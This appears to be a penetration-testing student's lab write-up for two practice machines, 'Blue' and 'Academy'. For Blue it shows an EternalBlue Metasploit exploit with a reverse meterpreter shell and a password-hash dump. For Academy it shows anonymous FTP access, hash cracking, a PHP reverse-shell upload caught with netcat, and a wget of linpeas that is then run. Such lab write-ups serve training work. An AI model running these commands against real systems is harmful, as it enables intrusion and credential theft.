Two other courses on Windows & Linux Privilege Escalation.
New capstone boxes are available here: https://drive.google.com/drive/folders/1VXEuyySgzsSo-MYmyCareTnJ5rAeVKeH
- Import
Blue.ovfin vmware, set the network settings to NAT, allow 4 GB to memory if you can. - access as an admin to get the ip via
cmdandipconfig. - on your kali,
ping 192.168.92.130to check if you see it.
- scanning with
nmap -T4 -p- -A 192.168.92.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 08:32 EDT
Nmap scan report for 192.168.92.130
Host is up (0.00070s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:C8:FA:61 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-845Q99OO4PP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c8:fa:61 (VMware)
|_clock-skew: mean: 1h20m00s, deviation: 2h18m33s, median: 0s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: WIN-845Q99OO4PP
| NetBIOS computer name: WIN-845Q99OO4PP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-07-22T08:33:49-04:00
| smb2-time:
| date: 2024-07-22T12:33:50
|_ start_date: 2024-07-22T18:09:06
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.92.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.28 seconds
Notes
Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1) + port 445 open: MS17-010 (EternalBlue) exploit
We can use nmap or msfconsole auxiliary scan (search for eternal blue)
nmap --script smb-vuln-ms17-010 -p445 192.168.92.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 08:59 EDT
Nmap scan report for 192.168.92.130
Host is up (0.00060s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:C8:FA:61 (VMware)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
- Launch Metasploit:
msfconsole - Search for the MS17-010 Exploit:
search ms17-010 - Select the Exploit:
use exploit/windows/smb/ms17_010_eternalblue - Set the Target IP:
set RHOSTS 192.168.92.130 - Set the Payload:
set PAYLOAD windows/x64/meterpreter/reverse_tcp(this is an enterprise machine) - Run the Exploit:
exploit(orcheckto only confirm the vulnerability, you don't want to exploit certain sensitive targets)
exploit
[*] Started reverse TCP handler on 192.168.92.128:4444
[*] 192.168.92.130:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.92.130:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.92.130:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.92.130:445 - The target is vulnerable.
[*] 192.168.92.130:445 - Connecting to target for exploitation.
[+] 192.168.92.130:445 - Connection established for exploitation.
[+] 192.168.92.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.92.130:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.92.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.92.130:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.92.130:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.92.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.92.130:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.92.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.92.130:445 - Starting non-paged pool grooming
[+] 192.168.92.130:445 - Sending SMBv2 buffers
[+] 192.168.92.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.92.130:445 - Sending final SMBv2 buffers.
[*] 192.168.92.130:445 - Sending last fragment of exploit packet!
[*] 192.168.92.130:445 - Receiving response from exploit packet
[+] 192.168.92.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.92.130:445 - Sending egg to corrupted connection.
[*] 192.168.92.130:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 192.168.92.130
[*] Meterpreter session 1 opened (192.168.92.128:4444 -> 192.168.92.130:49180) at 2024-07-22 09:03:05 -0400
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.92.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Results:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege
Hashdump to get admin hash.
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:f580a1940b1f6759fbdd9f5c482ccdbb:::
user:1000:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
For manual exploitation, look for eternalbue github, look for a detailed walkthrough. https://github.com/3ndG4me/AutoBlue-MS17-010
1 gb memory is enough, NAT for network.
- root:tcm to login
dhclient, thenip a
- scanning with
nmap -T4 -p- -A 192.168.92.131
nmap -T4 -p- -A 192.168.92.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 10:31 EDT
Nmap scan report for 192.168.92.131
Host is up (0.00082s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.92.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:9E:E0:5D (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.82 ms 192.168.92.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.49 seconds
Notes
80 - 192.168.92.131 - 16:37
default webpage - Apache/2.4.38 - php
404 - Debian means linux
phpmyadmin - http://192.168.92.131/phpmyadmin
/academy
/academy/admin
/academy/db
Apache version is outdated
ftp - anonymous login possible
info disclosure - note.txt - sensitive info
22 - OpenSSH 7.9p1 Debian 10+deb10u2
info disclosure - SSH Host Keys: RSA, ECDSA, and ED25519 keys are available
Usually, we don't start with ssh, only if we have a weak password or we want to see if the client detects brute-force attempts.
anonymous as username, blank for pwd.
ftp 192.168.92.131
Connected to 192.168.92.131.
220 (vsFTPd 3.0.3)
Name (192.168.92.131:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||45458|)
150 Opening BINARY mode data connection for note.txt (776 bytes).
100% |****************************************************************************************************************************************| 776 329.05 KiB/s 00:00 ETA
226 Transfer complete.
776 bytes received in 00:00 (34.13 KiB/s)
ftp>
Hello Heath !
Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP.
I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:
INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');
The StudentRegno number is what you use for login.
Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ?
We can always adapt it to our needs.
-jdelta
- run
hash-identifier locate rockyou.txtmousepad hashes.txtto save the hash to a filehashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
It's better to use a computer with a GPU to crack passwords.
Notes
cd73502828457d15655bbd7a63fb0bc8 is student
able to connect to the academy profile
able to upload a photo (code execution?)
We don't know where note.txt is located, if it was at the root, we could upload and execute some malware.
nikto -h http://192.168.92.131
nikto -h http://192.168.92.131
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.92.131
+ Target Hostname: 192.168.92.131
+ Target Port: 80
+ Start Time: 2024-07-22 10:40:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5c37b0dee585e, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
+ /phpmyadmin/changelog.php: Cookie goto created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /phpmyadmin/changelog.php: Cookie back created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpmyadmin/: phpMyAdmin directory found.
+ /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. See: https://typo3.org/
+ 8254 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2024-07-22 10:41:08 (GMT-4) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
dirb http://192.168.92.131
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jul 23 02:27:32 2024
URL_BASE: http://192.168.92.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.92.131/ ----
+ http://192.168.92.131/index.html (CODE:200|SIZE:10701)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/
+ http://192.168.92.131/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.92.131/phpmyadmin/ ----
+ http://192.168.92.131/phpmyadmin/ChangeLog (CODE:200|SIZE:17598)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/doc/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/examples/
+ http://192.168.92.131/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.92.131/phpmyadmin/index.php (CODE:200|SIZE:14555)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/js/
+ http://192.168.92.131/phpmyadmin/libraries (CODE:403|SIZE:279)
+ http://192.168.92.131/phpmyadmin/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/
+ http://192.168.92.131/phpmyadmin/phpinfo.php (CODE:200|SIZE:14557)
+ http://192.168.92.131/phpmyadmin/README (CODE:200|SIZE:1520)
+ http://192.168.92.131/phpmyadmin/robots.txt (CODE:200|SIZE:26)
+ http://192.168.92.131/phpmyadmin/setup (CODE:401|SIZE:461)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/sql/
+ http://192.168.92.131/phpmyadmin/templates (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/vendor/
---- Entering directory: http://192.168.92.131/phpmyadmin/doc/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/doc/html/
---- Entering directory: http://192.168.92.131/phpmyadmin/examples/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/js/transformations/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/js/vendor/
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ar/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/az/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/be/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/bg/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ca/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/cs/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/da/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/de/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/el/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/es/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/et/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/fi/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/fr/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/gl/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/hu/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ia/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/id/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/it/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ja/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ko/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/lt/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/nl/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/pl/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/pt/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/pt_BR/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ro/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/ru/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/si/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/sk/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/sl/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/sq/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/sv/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/th/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/tr/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/uk/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/vi/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/zh_CN/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/locale/zh_TW/
---- Entering directory: http://192.168.92.131/phpmyadmin/sql/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/
---- Entering directory: http://192.168.92.131/phpmyadmin/vendor/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/vendor/composer/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/vendor/google/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/vendor/phpmyadmin/
---- Entering directory: http://192.168.92.131/phpmyadmin/doc/html/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/doc/html/_images/
+ http://192.168.92.131/phpmyadmin/doc/html/index.html (CODE:200|SIZE:14929)
---- Entering directory: http://192.168.92.131/phpmyadmin/js/transformations/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/js/vendor/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/js/vendor/jquery/
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ar/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/az/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/be/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/bg/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ca/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/cs/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/da/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/de/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/el/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/es/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/et/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/fi/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/fr/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/gl/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/hu/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ia/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/id/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/it/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ja/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ko/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/lt/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/nl/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/pl/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/pt/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/pt_BR/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ro/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/ru/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/si/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/sk/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/sl/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/sq/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/sv/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/th/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/tr/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/uk/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/vi/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/zh_CN/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/locale/zh_TW/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/img/
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/jquery/
---- Entering directory: http://192.168.92.131/phpmyadmin/vendor/composer/ ----
+ http://192.168.92.131/phpmyadmin/vendor/composer/LICENSE (CODE:200|SIZE:1070)
---- Entering directory: http://192.168.92.131/phpmyadmin/vendor/google/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/vendor/phpmyadmin/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/doc/html/_images/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/js/vendor/jquery/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/css/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/img/ ----
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: http://192.168.92.131/phpmyadmin/themes/original/jquery/images/
---- Entering directory: http://192.168.92.131/phpmyadmin/themes/original/jquery/images/ ----
-----------------
END_TIME: Tue Jul 23 02:31:17 2024
DOWNLOADED: 276720 - FOUND: 14
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.92.131/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.92.131/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# on atleast 2 different hosts [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 5ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 6ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 5ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 5ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 6ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 5ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 13ms]
# Copyright 2007 James Fisher [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 199ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 225ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 415ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 449ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 471ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 525ms]
academy [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 1ms]
phpmyadmin [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 7ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 6ms]
:: Progress: [220560/220560] :: Job [1/1] :: 6060 req/sec :: Duration: [0:00:46] :: Errors: 0 ::
Faster because we look only one-level deep.
- we try to upload a profile photo, it is stored at
studentphoto/boys-profile-picture-screenshot.jpg - we can upload php scripts, like creating a web shell or a payload https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
- edit the ip with your kali machine before uploading, open a port listener
nc -lvnp 4444
nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.131] 58432
whoami
www-data
mkdir tmpandcd tmp- download linpeas
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.shandchmod +x linpeas.sh - run
./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by github.com/PEASS-ng
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
